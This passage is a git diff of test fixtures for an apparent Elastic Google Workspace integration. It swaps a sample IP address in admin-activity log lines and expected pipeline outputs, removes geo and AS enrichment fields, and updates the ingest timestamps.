"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "REORDER_GROUP_BASED_POLICIES_EVENT", "id": "1", @@ -342,7 +270,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -366,35 +294,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876906100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:24.232187800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GPLUS_PREMIUM_FEATURES", "id": "1", @@ -425,7 +335,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -447,35 +357,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876912200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232194900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CREATE_MANAGED_CONFIGURATION", "id": "1", @@ -505,7 +397,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -527,35 +419,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876918700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232202500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "DELETE_MANAGED_CONFIGURATION", "id": "1", @@ -585,7 +459,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -607,35 +481,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876924200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232209900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_MANAGED_CONFIGURATION", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -688,35 +544,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876930100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", + "ingested": "2021-12-09T13:38:24.232262300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", "provider": "admin", "action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log index bcbed9ee886..6a2cc3c3072 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log @@ -1,13 +1,13 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json index 9b94370ef3f..053ba1dfa15 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433465700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_BUILDING", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375121400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:25.433469800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_BUILDING", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375128600Z", - "original": 